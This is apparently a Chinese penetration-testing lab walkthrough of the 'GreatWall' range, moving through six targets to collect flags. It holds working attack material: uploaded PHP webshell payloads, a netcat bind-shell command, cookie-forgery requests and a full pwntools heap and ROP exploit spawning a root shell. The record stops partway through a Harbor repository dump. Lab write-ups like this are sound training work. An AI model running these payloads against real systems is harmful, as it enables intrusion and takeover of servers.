GreatWall
在这个靶场中,您将扮演一名渗透测试工程师,接受雇佣任务来评估“SmartLink Technologies Ltd.”公司的网络安全状况。 您的任务是首先入侵该公司暴露在公网上的应用服务,然后运用后渗透技巧深入 SmartLink公司的内部网络。在这个过程中,您将寻找潜在的弱点和漏洞,并逐一接管所有服务,从而控制整个内部网络。靶场中共设置了6个Flag,它们分布在不同的靶机上,您需要找到并获取这些 Flag 作为您的成就目标。
1. flag 01
┌──(root㉿kali)-[~]
└─# fscan -h 39.101.70.161
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[798ms] 已选择服务扫描模式
[798ms] 开始信息扫描
[798ms] 最终有效主机数量: 1
[798ms] 开始主机扫描
[798ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[798ms] 有效端口数量: 233
[857ms] [*] 端口开放 39.101.70.161:22
[869ms] [*] 端口开放 39.101.70.161:8080
[872ms] [*] 端口开放 39.101.70.161:80
[3.8s] 扫描完成, 发现 3 个开放端口
[3.8s] 存活端口数量: 3
[3.8s] 开始漏洞扫描
[3.8s] POC加载完成: 总共387个,成功387个,失败0个
[3.9s] [*] 网站标题 http://39.101.70.161 状态码:200 长度:10887 标题:""
[5.2s] [*] 网站标题 http://39.101.70.161:8080 状态码:200 长度:1027 标题:Login Form
[9.8s] [+] 目标: http://39.101.70.161:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
参考链接:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
1.1. ThinkPHP/5.0.23-rce
/var/www/html/background/public/ >cat /f1ag01_UdEv.txt
flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}
/var/www/html/background/public/ >ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:12:c4:00 brd ff:ff:ff:ff:ff:ff
inet 172.28.23.17/16 brd 172.28.255.255 scope global dynamic eth0
valid_lft 1892159641sec preferred_lft 1892159641sec
inet6 fe80::216:3eff:fe12:c400/64 scope link
valid_lft forever preferred_lft forever
1.2. 内网扫描
www-data@portal:/tmp$ ./fscan -h 172.28.23.17/24
[1.8s] 当前用户权限不足,无法发送ICMP包
[1.8s] 切换为PING方式探测...
[2.8s] [*] 目标 172.28.23.17 存活 (ICMP)
[4.8s] [*] 目标 172.28.23.26 存活 (ICMP)
[4.8s] [*] 目标 172.28.23.33 存活 (ICMP)
[7.8s] 存活主机数量: 3
[7.8s] 有效端口数量: 233
[7.8s] [*] 端口开放 172.28.23.17:80
[7.8s] [*] 端口开放 172.28.23.33:22
[7.8s] [*] 端口开放 172.28.23.17:8080
[7.8s] [*] 端口开放 172.28.23.17:22
[7.8s] [*] 端口开放 172.28.23.26:21
[7.8s] [*] 端口开放 172.28.23.26:80
[7.8s] [*] 端口开放 172.28.23.33:8080
[7.8s] [*] 端口开放 172.28.23.26:22
[7.8s] 扫描完成, 发现 8 个开放端口
[7.8s] 存活端口数量: 8
[7.8s] 开始漏洞扫描
[8.0s] [*] 网站标题 http://172.28.23.17 状态码:200 长度:10887 标题:""
[8.0s] POC加载完成: 总共387个,成功387个,失败0个
>>>> [8.0s] [*] 网站标题 http://172.28.23.26 状态码:200 长度:13693 标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
>>>> [8.2s] [+] FTP服务 172.28.23.26:21 匿名登录成功!
>>>> [8.2s] [*] 网站标题 http://172.28.23.17:8080 状态码:200 长度:1027 标题:Login Form
>>>> [8.3s] [*] 网站标题 http://172.28.23.33:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.28.23.33:8080/login;jsessionid=8D16C89D74D2C22DDC40A4F87D27C134
[8.7s] [*] 网站标题 http://172.28.23.33:8080/login;jsessionid=8D16C89D74D2C22DDC40A4F87D27C134 状态码:200 长度:3860 标题:智联科技 ERP 后台登陆
[8.9s] [+] 目标: http://172.28.23.17:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
参考链接:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
>>>> [9.9s] [+] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
参考链接:https://github.com/LandGrey/SpringBootVulExploit
[46.6s] 扫描已完成: 12/12
IP: 172.28.23.17 www-data
端口: 22, 服务: SSH
端口: 80, 服务: HTTP
端口: 8080, 服务: ThinkPHP, 漏洞: ThinkPHP 5.0.23 Method RCE
IP: 172.28.23.26
端口: 21, 服务: FTP, 漏洞: FTP匿名登录成功
端口: 22, 服务: SSH
端口: 80, 服务: 新翔OA管理系统
IP: 172.28.23.33
端口: 22, 服务: SSH
端口: 8080, 服务: SpringBoot/智联科技ERP, 漏洞: SpringBoot Env 未授权访问
1.3. 内网代理
www-data@portal:/tmp$ ./ligolo_agent -bind 0.0.0.0:20000 -ignore-cert
WARN[0000] TLS Certificate fingerprint is: C1F578B028FC9673A3AB6EE1C270427C33EF4C2F1B6A35AFFBA4D72BB64B728A
INFO[0000] Listening on 0.0.0.0:20000...
INFO[0066] Got connection from: 183.228.210.110:17798
INFO[0066] Connection established addr="183.228.210.110:17798"
ligolo-ng » connect_agent --ip 39.101.70.161:20000
? TLS Certificate Fingerprint is: C1F578B028FC9673A3AB6EE1C270427C33EF4C2F1B6A35AFFBA4D72BB64B728A, connect? Yes
INFO[0051] Agent connected. id=00163e12c400 name=www-data@portal remote="39.101.70.161:20000"
ligolo-ng » interface_create --name gwall
INFO[0079] Creating a new gwall interface...
INFO[0079] Interface created!
ligolo-ng » session
? Specify a session : 1 - www-data@portal - 39.101.70.161:20000 - 00163e12c400
[Agent : www-data@portal] » tunnel_start --tun gwall
INFO[0093] Starting tunnel to www-data@portal (00163e12c400)
[Agent : www-data@portal] » ifconfig
┌────────────────────────────────────┐
│ Interface 0 │
├──────────────┬─────────────────────┤
│ Name │ lo │
│ Hardware MAC │ │
│ MTU │ 65536 │
│ Flags │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8 │
│ IPv6 Address │ ::1/128 │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1 │
├──────────────┬────────────────────────────────┤
│ Name │ eth0 │
│ Hardware MAC │ 00:16:3e:12:c4:00 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.28.23.17/16 │
│ IPv6 Address │ fe80::216:3eff:fe12:c400/64 │
└──────────────┴────────────────────────────────┘
[Agent : www-data@portal] » interface_add_route --name gwall --route 172.28.23.17/24
INFO[0151] Route created.
[Agent : www-data@portal] »
2. flag 02 172.28.23.26
IP: 172.28.23.26
端口: 21, 服务: FTP, 漏洞: FTP匿名登录成功
端口: 22, 服务: SSH
端口: 80, 服务: 新翔OA管理系统
2.1. ftp空会话
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# ftp 172.28.23.26
Connected to 172.28.23.26.
220 (vsFTPd 3.0.3)
Name (172.28.23.26:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10678|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 7536672 Mar 23 2024 OASystem.zip
226 Directory send OK.
ftp> get OASystem.zip
local: OASystem.zip remote: OASystem.zip
229 Entering Extended Passive Mode (|||37229|)
150 Opening BINARY mode data connection for OASystem.zip (7536672 bytes).
100% |**************************************************************************************| 7360 KiB 1.33 MiB/s 00:00 ETA
226 Transfer complete.
7536672 bytes received in 00:05 (1.33 MiB/s)
ftp>
审计网站源码,ai直接梭哈
<?php
function islogin(){
if(isset($_COOKIE['id'])&&isset($_COOKIE['loginname'])&&isset($_COOKIE['jueseid'])&&isset($_COOKIE['danweiid'])&&isset($_COOKIE['quanxian'])){
>>>> if($_COOKIE['id']!=''&&$_COOKIE['loginname']!=''&&$_COOKIE['jueseid']!=''&&$_COOKIE['danweiid']!=''&&$_COOKIE['quanxian']!=''){
>>>> return true;
}
else {
return false;
}
}
else {
return false;
}
}
?>
GET /main.php HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
>>>> Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
/uploadbase64.php
<?php
/**
* Description: PhpStorm.
* Author: yoby
* DateTime: 2018/12/4 18:01
* Email:logove@qq.com
* Copyright Yoby版权所有
*/
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
>>>> $type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Connection: close
imgbase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
HTTP/1.1 200 OK
Date: Wed, 21 Jan 2026 06:37:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=UTF-8
{"src":"upload/2026-01-21-6970744429a68.php"}
2.2. Bypass disable_functions
Bypass Disable_functions
http://www.mi1k7ea.com/2019/08/03/%E4%BB%8E%E8%9A%81%E5%89%91%E6%8F%92%E4%BB%B6%E7%9C%8B%E5%88%A9%E7%94%A8PHP-FPM%E7%BB%95%E8%BF%87disable-functions/
POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close
imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==
HTTP/1.1 200 OK
Date: Wed, 21 Jan 2026 06:42:50 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=UTF-8
{"src":"upload/2026-01-21-6970756a83fcf.php"}
上传webshell,然后用蚁剑连接
点击开始后就会上传一个.antproxy.php 文件,同目录下新建一个shell.php
#/var/www/html/OAsystem/upload/shell.php
<?php system($_GET['cmd']);?>
修改 .antproxy.php 将url指向我们这个shell.php
此时访问这个时候我们访问.antproxy.php 相当于访问shell.php
GET http://172.28.23.26/upload/.antproxy.php?cmd=whoami HTTP/1.1
Host: 172.28.23.26
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Connection: close
这里是get请求的后门,
GET http://172.28.23.26/upload/.antproxy.php?cmd=chmod+%2bx+/tmp/stowaway_agent
GET http://172.28.23.26/upload/.antproxy.php?cmd=/tmp/stowaway_agent+-l+4444
nc -lp 4444 -e /bin/bash
[*] Trying to connect node actively
.-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-.
( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-.
(_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--.
/ _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' /
\ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') /
'..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ /
.-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_
\ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__)
'-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--'
{ v2.2 Author:ph4ntom }
[*] Waiting for new connection...
[*] Connect to node 172.28.23.26:4444 successfully! Node id is 0
(admin) >>
www-data@ubuntu-oa:/var/www/html/OAsystem/upload$ find / -perm -4000 2>/dev/null
</html/OAsystem/upload$ find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
>>>> /usr/bin/base32
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep
www-data@ubuntu-oa:/var/www/html/OAsystem/upload$ base32 /flag02.txt |base32 -d
</html/OAsystem/upload$ base32 /flag02.txt |base32 -d
>>>> flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
www-data@ubuntu-oa:/var/www/html/OAsystem/upload$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:12:c4:7d brd ff:ff:ff:ff:ff:ff
>>>> inet 172.28.23.26/16 brd 172.28.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe12:c47d/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:12:c3:cc brd ff:ff:ff:ff:ff:ff
>>>> inet 172.22.14.6/16 brd 172.22.255.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe12:c3cc/64 scope link
valid_lft forever preferred_lft forever
3. flag03 172.28.23.33
IP: 172.28.23.33
端口: 22, 服务: SSH
端口: 8080, 服务: SpringBoot/智联科技ERP, 漏洞: SpringBoot Env 未授权访问 heapdump
3.1. SpringBoot heapdump &Shiro反序列化
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# dirsearch -u http://172.28.23.33:8080/ -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/ChunQiu/Greatwall/reports/http_172.28.23.33_8080/__26-01-21_02-13-52.txt
Target: http://172.28.23.33:8080/
[02:13:52] Starting:
[02:13:56] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[02:13:56] 400 - 435B - /a%5c.aspx
[02:13:57] 200 - 2KB - /actuator
[02:13:57] 200 - 20B - /actuator/caches
[02:13:57] 200 - 99KB - /actuator/conditions
[02:13:57] 200 - 7KB - /actuator/env
[02:13:57] 200 - 91KB - /actuator/beans
[02:13:57] 200 - 167B - /actuator/health
[02:13:57] 200 - 54B - /actuator/scheduledtasks
[02:13:57] 200 - 2B - /actuator/info
[02:13:57] 200 - 50KB - /actuator/loggers
[02:13:57] 200 - 1018B - /actuator/metrics
[02:13:57] 200 - 14KB - /actuator/configprops
[02:13:57] 200 - 22KB - /actuator/mappings
[02:13:57] 200 - 82KB - /actuator/threaddump
>>>> [02:13:58] 200 - 29MB - /actuator/heapdump
[02:14:12] 200 - 4KB - /login
[02:14:12] 200 - 4KB - /login/
Task Completed
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
===========================================
>>>> CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
===========================================
ops01@ubuntu-erp:/tmp$ netstat -lnpt
netstat -lnpt
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 672/java
ops01@ubuntu-erp:/tmp$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:12:c4:58 brd ff:ff:ff:ff:ff:ff
inet 172.28.23.33/16 brd 172.28.255.255 scope global dynamic eth0
valid_lft 1892152714sec preferred_lft 1892152714sec
inet6 fe80::216:3eff:fe12:c458/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:12:c4:79 brd ff:ff:ff:ff:ff:ff
inet 172.22.10.16/24 brd 172.22.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe12:c479/64 scope link
valid_lft forever preferred_lft forever
from pwn import *
context.arch = 'amd64'
def add(key, data='b'):
p.sendlineafter(b'Option:', b'1')
p.sendlineafter(b'Key:', key)
p.sendlineafter(b'Data:', data)
def show(key):
p.sendlineafter(b'Option:', b'2')
p.sendlineafter(b"Key: ", key)
def edit(key, data):
p.sendlineafter(b'Option:', b'3')
p.sendlineafter(b'Key:', key)
p.sendlineafter(b'Data:', data)
def name(username):
p.sendlineafter(b'Option:', b'4')
p.sendlineafter(b'name:', username)
# 连接目标
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username = 0x5dc980
stack = 0x5e4fa8
ukey = b'\x30'*5 + b'\x31' + b'\x44'
# 构造第一个 fake_chunk,用于泄露地址
fake_chunk = flat({
0: username + 0x10,
0x10: [username + 0x20, len(ukey), ukey, 0],
0x30: [stack, 0x10]
}, filler=b'\x00')
p.sendlineafter(b'name', fake_chunk)
p.sendlineafter(b'word', 'freep@ssw0rd:3')
add(b'\x30'*1 + b'\x31' + b'\x44', b'test') # 126
add(b'\x30'*2 + b'\x31' + b'\x44', b'test') # 127
# 泄露栈地址/返回地址
show(ukey)
main_ret = u64(p.read(8)) - 0x1e0
# ROP Gadgets 定义
rdi = 0x0000000000405e7c # pop rdi ; ret
rsi = 0x000000000040974f # pop rsi ; ret
rdx = 0x000000000053514b # pop rdx ; pop rbx ; ret
rax = 0x00000000004206ba # pop rax ; ret
syscall = 0x00000000004560c6 # syscall
# 构造第二个 fake_chunk,将编辑目标指向返回地址
fake_chunk = flat({
0: username + 0x20,
0x20: [username + 0x30, len(ukey), ukey, 0],
0x40: [main_ret, 0x100, b'/bin/sh\x00']
}, filler=b'\x00')
name(fake_chunk.ljust(0x80, b'\x00'))
# 构造 ROP 链执行 execve("/bin/sh", 0, 0)
payload = flat([
rdi, username + 0x50,
rsi, 0,
rdx, 0, 0,
rax, 0x3b,
syscall
])
p.sendlineafter(b'Option:', b'3')
p.sendlineafter(b'Key:', ukey)
p.sendline(payload)
# 触发返回,执行 ROP
p.sendlineafter(b'Option:', b'9')
p.interactive()
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# python exp.py
[+] Opening connection to 172.28.23.33 on port 59696: Done
/root/Desktop/ChunQiu/Greatwall/exp.py:38: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
p.sendlineafter(b'word', 'freep@ssw0rd:3')
[*] Switching to interactive mode
Invalid!$ whoami
root
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:12:c4:58 brd ff:ff:ff:ff:ff:ff
>>>> inet 172.28.23.33/16 brd 172.28.255.255 scope global dynamic eth0
valid_lft 1892152373sec preferred_lft 1892152373sec
inet6 fe80::216:3eff:fe12:c458/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:12:c4:79 brd ff:ff:ff:ff:ff:ff
>>>> inet 172.22.10.16/24 brd 172.22.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe12:c479/64 scope link
valid_lft forever preferred_lft forever
$ cat f1ag03.txt
flag03: flag{6a326f94-6526-4586-8233-152d137281fd}
4. 双层内网搭建
IP: 172.28.23.26 内网 172.22.14.6/16
端口: 21, 服务: FTP, 漏洞: FTP匿名登录成功
端口: 22, 服务: SSH
端口: 80, 服务: 新翔OA管理系统
IP: 172.28.23.33 内网 172.22.10.16/24
端口: 22, 服务: SSH
端口: 8080, 服务: SpringBoot/智联科技ERP, 漏洞: SpringBoot Env 未授权访问
用ligolo在这两台机器都搭个代理172.22.10.16/24和172.22.14.6/16
客户端
./ligolo_agent -bind 0.0.0.0:4446 -ignore-cert
服务端
[Agent : www-data@portal] » connect_agent --ip 172.28.23.33:4446
? TLS Certificate Fingerprint is: E0158D0A4A44DFCAC2FE3A2AAEDFB1D6C71EE0F4126CF30344D6B0C483F65DB1, connect? Yes
INFO[6882] Agent connected. id=00163e12c458 name=ops01@ubuntu-erp remote="172.28.23.33:4446"
[Agent : www-data@portal] » session
? Specify a session : 2 - ops01@ubuntu-erp - 172.28.23.33:4446 - 00163e12c458
[Agent : ops01@ubuntu-erp] » interface_create --name gwall2
INFO[6941] Creating a new gwall2 interface...
INFO[6941] Interface created!
[Agent : ops01@ubuntu-erp] » tunnel_start --tun gwall2
INFO[6964] Starting tunnel to ops01@ubuntu-erp (00163e12c458)
[Agent : ops01@ubuntu-erp] » interface_add_route --name gwall2 --route 172.22.10.16/24
INFO[7009] Route created.
[Agent : ops01@ubuntu-erp] » session
? Specify a session : [Use arrows to move, type to filter]
> 1 - www-data@portal - 39.101.70.161:20000 - 00163e12c400
2 - ops01@ubuntu-erp - 172.28.23.33:4446 - 00163e12c458
3 - www-data@ubuntu-oa - 172.28.23.26:4447 - 00163e12c47d
4.1. 主机探测
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fping -agq 172.22.14.6/24
172.22.14.6
172.22.14.37
172.22.14.46
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fping -agq 172.22.10.6/24
172.22.10.16
172.22.10.28
4.2. 端口扫描
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fscan -h 172.22.14.37
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[890ms] 已选择服务扫描模式
[890ms] 开始信息扫描
[890ms] 最终有效主机数量: 1
[890ms] 开始主机扫描
[890ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp,
ssh, telnet, vnc, webpoc, webtitle
[890ms] 有效端口数量: 233
[987ms] [*] 端口开放 172.22.14.37:22
[991ms] [*] 端口开放 172.22.14.37:2379
[1.0s] [*] 端口开放 172.22.14.37:10250
[1.0s] 扫描完成, 发现 3 个开放端口
[1.0s] 存活端口数量: 3
[1.0s] 开始漏洞扫描
[1.1s] POC加载完成: 总共387个,成功387个,失败0个
[1.3s] [*] 网站标题 https://172.22.14.37:10250 状态码:404 长度:19 标题:无标题
[35.3s] 扫描已完成: 5/5
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fscan -h 172.22.14.46
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[897ms] 已选择服务扫描模式
[897ms] 开始信息扫描
[897ms] 最终有效主机数量: 1
[897ms] 开始主机扫描
[897ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp,
ssh, telnet, vnc, webpoc, webtitle
[897ms] 有效端口数量: 233
[997ms] [*] 端口开放 172.22.14.46:22
[999ms] [*] 端口开放 172.22.14.46:80
[1.0s] 扫描完成, 发现 2 个开放端口
[1.0s] 存活端口数量: 2
[1.0s] 开始漏洞扫描
[1.1s] POC加载完成: 总共387个,成功387个,失败0个
[1.1s] [*] 网站标题 http://172.22.14.46 状态码:200 长度:785 标题:Harbor
[1.2s] [*] 发现指纹 目标: http://172.22.14.46 指纹: [Harbor]
[7.0s] [+] 检测到漏洞 http://172.22.14.46:80/swagger.json poc-yaml-swagger-ui-unauth 参数:[{path swagger.json}]
[52.3s] 扫描已完成: 3/3
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fscan -h 172.22.10.28
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[910ms] 已选择服务扫描模式
[910ms] 开始信息扫描
[910ms] 最终有效主机数量: 1
[910ms] 开始主机扫描
[910ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp,
ssh, telnet, vnc, webpoc, webtitle
[910ms] 有效端口数量: 233
[1.0s] [*] 端口开放 172.22.10.28:22
[1.0s] [*] 端口开放 172.22.10.28:80
[1.0s] [*] 端口开放 172.22.10.28:3306
[1.1s] 扫描完成, 发现 3 个开放端口
[1.1s] 存活端口数量: 3
[1.1s] 开始漏洞扫描
[1.1s] POC加载完成: 总共387个,成功387个,失败0个
[1.2s] [*] 网站标题 http://172.22.10.28 状态码:200 长度:1975 标题:DooTask
[47.4s] 扫描已完成: 4/4
IP: 172.22.14.37
端口: 22, 服务: SSH
端口: 2379, 服务: etcd
端口: 10250, 服务: Kubelet API (Kubernetes)
IP: 172.22.14.46
端口: 22, 服务: SSH
端口: 80, 服务: Harbor (容器镜像仓库)
漏洞: Swagger UI 未授权访问 (http://172.22.14.46:80/swagger.json)
IP: 172.22.10.28
端口: 22, 服务: SSH
端口: 80, 服务: DooTask (开源项目管理工具)
端口: 3306, 服务: MySQL 数据库
漏洞: DooTask 管理系统,
5. flag04 172.22.14.46
IP: 172.22.14.46
端口: 22, 服务: SSH
端口: 80, 服务: Harbor (容器镜像仓库)
漏洞: Swagger UI 未授权访问 (http://172.22.14.46:80/swagger.json)
5.1. harbor未授权
┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
>>>> [+] harbor/secret
┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/ --dump harbor/secret --v2
[+] Dumping : harbor/secret:latest
